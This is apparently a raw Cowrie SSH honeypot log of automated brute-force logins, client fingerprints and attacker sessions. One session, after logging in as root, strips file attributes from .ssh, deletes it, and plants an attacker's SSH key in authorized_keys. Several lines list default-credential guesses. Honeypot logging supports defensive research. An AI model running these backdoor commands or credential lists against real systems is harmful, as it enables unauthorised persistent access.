{"eventid":"cowrie.login.failed","username":"daemon","password":"123456","message":"login attempt [daemon/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T00:41:56.744382Z","src_ip":"212.227.125.160","session":"436c632a7306"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:41:57.360422Z","src_ip":"212.227.125.160","session":"f094748a0af2"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T00:41:57.361225Z","src_ip":"212.227.125.160","session":"f094748a0af2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:41:57.455894Z","src_ip":"212.227.125.160","session":"f094748a0af2"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:41:57.457085Z","src_ip":"212.227.125.160","session":"f094748a0af2"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:41:58.160072Z","src_ip":"212.227.125.160","session":"436c632a7306"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36096,"dst_ip":"1.2.3.4","dst_port":22,"session":"8b2a18f12dee","protocol":"ssh","message":"New connection: 212.227.125.160:36096 (1.2.3.4:22) [session: 8b2a18f12dee]","sensor":"my-vps","timestamp":"2025-08-31T00:42:05.562074Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T00:42:05.563422Z","src_ip":"212.227.125.160","session":"8b2a18f12dee"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T00:42:05.643591Z","src_ip":"212.227.125.160","session":"8b2a18f12dee"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin1","message":"login attempt [admin/admin1] failed","sensor":"my-vps","timestamp":"2025-08-31T00:42:06.053984Z","src_ip":"212.227.125.160","session":"8b2a18f12dee"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50324,"dst_ip":"1.2.3.4","dst_port":22,"session":"7d2a3cdd3407","protocol":"ssh","message":"New connection: 212.227.125.160:50324 (1.2.3.4:22) [session: 7d2a3cdd3407]","sensor":"my-vps","timestamp":"2025-08-31T00:42:06.572431Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:42:06.573317Z","src_ip":"212.227.125.160","session":"7d2a3cdd3407"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:42:06.646991Z","src_ip":"212.227.125.160","session":"7d2a3cdd3407"}
{"eventid":"cowrie.login.failed","username":"git","password":"123456","message":"login attempt [git/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T00:42:06.871560Z","src_ip":"212.227.125.160","session":"7d2a3cdd3407"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin@123","message":"login attempt [admin/admin@123] failed","sensor":"my-vps","timestamp":"2025-08-31T00:42:07.135906Z","src_ip":"212.227.125.160","session":"8b2a18f12dee"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:42:08.025980Z","src_ip":"212.227.125.160","session":"7d2a3cdd3407"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin123","message":"login attempt [admin/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T00:42:08.217750Z","src_ip":"212.227.125.160","session":"8b2a18f12dee"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1234","message":"login attempt [admin/1234] failed","sensor":"my-vps","timestamp":"2025-08-31T00:42:09.310760Z","src_ip":"212.227.125.160","session":"8b2a18f12dee"}
{"eventid":"cowrie.login.failed","username":"admin","password":"Abcd1234","message":"login attempt [admin/Abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-31T00:42:10.394168Z","src_ip":"212.227.125.160","session":"8b2a18f12dee"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:42:11.480570Z","src_ip":"212.227.125.160","session":"8b2a18f12dee"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46976,"dst_ip":"1.2.3.4","dst_port":22,"session":"1e009ae41a6f","protocol":"ssh","message":"New connection: 212.227.125.160:46976 (1.2.3.4:22) [session: 1e009ae41a6f]","sensor":"my-vps","timestamp":"2025-08-31T00:42:17.002250Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:42:17.003505Z","src_ip":"212.227.125.160","session":"1e009ae41a6f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:42:17.076970Z","src_ip":"212.227.125.160","session":"1e009ae41a6f"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"123","message":"login attempt [postgres/123] failed","sensor":"my-vps","timestamp":"2025-08-31T00:42:17.503255Z","src_ip":"212.227.125.160","session":"1e009ae41a6f"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:42:18.579576Z","src_ip":"212.227.125.160","session":"1e009ae41a6f"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:42:23.666318Z","src_ip":"212.227.125.160","session":"d7a0218e3744"}
{"eventid":"cowrie.session.closed","duration":31.571045875549316,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:42:23.712954Z","src_ip":"212.227.125.160","session":"bf47f0579495"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41690,"dst_ip":"1.2.3.4","dst_port":22,"session":"fcb51781da92","protocol":"ssh","message":"New connection: 212.227.125.160:41690 (1.2.3.4:22) [session: fcb51781da92]","sensor":"my-vps","timestamp":"2025-08-31T00:42:27.382227Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:42:27.386135Z","src_ip":"212.227.125.160","session":"fcb51781da92"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:42:27.457950Z","src_ip":"212.227.125.160","session":"fcb51781da92"}
{"eventid":"cowrie.session.connect","src_ip":"175.110.65.160","src_port":6329,"dst_ip":"1.2.3.4","dst_port":22,"session":"cd89b6b041a6","protocol":"ssh","message":"New connection: 175.110.65.160:6329 (1.2.3.4:22) [session: cd89b6b041a6]","sensor":"my-vps","timestamp":"2025-08-31T00:42:27.529915Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.0","message":"Remote SSH version: SSH-2.0-libssh2_1.11.0","sensor":"my-vps","timestamp":"2025-08-31T00:42:27.530959Z","src_ip":"175.110.65.160","session":"cd89b6b041a6"}
{"eventid":"cowrie.client.kex","hassh":"14b2ddda386a4d1006108ccd231b42fc","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-rsa-cert-v01@openssh.com","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 14b2ddda386a4d1006108ccd231b42fc","sensor":"my-vps","timestamp":"2025-08-31T00:42:27.556342Z","src_ip":"175.110.65.160","session":"cd89b6b041a6"}
{"eventid":"cowrie.login.success","username":"root","password":"cisco","message":"login attempt [root/cisco] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:42:27.682359Z","src_ip":"175.110.65.160","session":"cd89b6b041a6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"google.com","dst_port":80,"src_ip":"175.110.65.160","src_port":8082,"message":"direct-tcp connection request to google.com:80 from 127.0.0.1:8082","sensor":"my-vps","timestamp":"2025-08-31T00:42:27.708593Z","session":"cd89b6b041a6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"google.com","dst_port":80,"data":"b'GET / HTTP/1.1\\r\\nUser-Agent: Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.18\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to google.com:80 with data b'GET / HTTP/1.1\\r\\nUser-Agent: Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.18\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T00:42:27.734406Z","src_ip":"175.110.65.160","session":"cd89b6b041a6"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:42:27.761253Z","src_ip":"175.110.65.160","session":"cd89b6b041a6"}
{"eventid":"cowrie.login.failed","username":"svnuser","password":"123456","message":"login attempt [svnuser/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T00:42:27.852274Z","src_ip":"212.227.125.160","session":"fcb51781da92"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:42:28.971351Z","src_ip":"212.227.125.160","session":"fcb51781da92"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46992,"dst_ip":"1.2.3.4","dst_port":22,"session":"98bda20dc892","protocol":"ssh","message":"New connection: 212.227.235.229:46992 (1.2.3.4:22) [session: 98bda20dc892]","sensor":"my-vps","timestamp":"2025-08-31T00:42:29.577183Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:42:29.578359Z","src_ip":"212.227.235.229","session":"98bda20dc892"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:42:29.884043Z","src_ip":"212.227.235.229","session":"98bda20dc892"}
{"eventid":"cowrie.login.success","username":"root","password":"RXyunji@!821$#.CF","message":"login attempt [root/RXyunji@!821$#.CF] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:42:31.145377Z","src_ip":"212.227.235.229","session":"98bda20dc892"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:42:31.783181Z","src_ip":"212.227.235.229","session":"98bda20dc892"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T00:42:31.783869Z","src_ip":"212.227.235.229","session":"98bda20dc892"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T00:42:31.784937Z","src_ip":"212.227.235.229","session":"98bda20dc892"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:42:32.091055Z","src_ip":"212.227.235.229","session":"98bda20dc892"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:42:32.762687Z","src_ip":"212.227.235.229","session":"98bda20dc892"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T00:42:32.763421Z","src_ip":"212.227.235.229","session":"98bda20dc892"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T00:42:33.070391Z","src_ip":"212.227.235.229","session":"98bda20dc892"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:42:33.071294Z","src_ip":"212.227.235.229","session":"98bda20dc892"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52830,"dst_ip":"1.2.3.4","dst_port":22,"session":"b6caf0fc1b8c","protocol":"ssh","message":"New connection: 212.227.235.229:52830 (1.2.3.4:22) [session: b6caf0fc1b8c]","sensor":"my-vps","timestamp":"2025-08-31T00:42:33.362544Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:42:33.363233Z","src_ip":"212.227.235.229","session":"b6caf0fc1b8c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:42:33.661396Z","src_ip":"212.227.235.229","session":"b6caf0fc1b8c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T00:42:34.892584Z","src_ip":"212.227.235.229","session":"b6caf0fc1b8c"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:42:36.193990Z","src_ip":"212.227.235.229","session":"b6caf0fc1b8c"}
{"eventid":"cowrie.session.connect","src_ip":"172.236.228.229","src_port":21358,"dst_ip":"1.2.3.4","dst_port":22,"session":"4cf93f9cd040","protocol":"ssh","message":"New connection: 172.236.228.229:21358 (1.2.3.4:22) [session: 4cf93f9cd040]","sensor":"my-vps","timestamp":"2025-08-31T00:42:36.306906Z"}
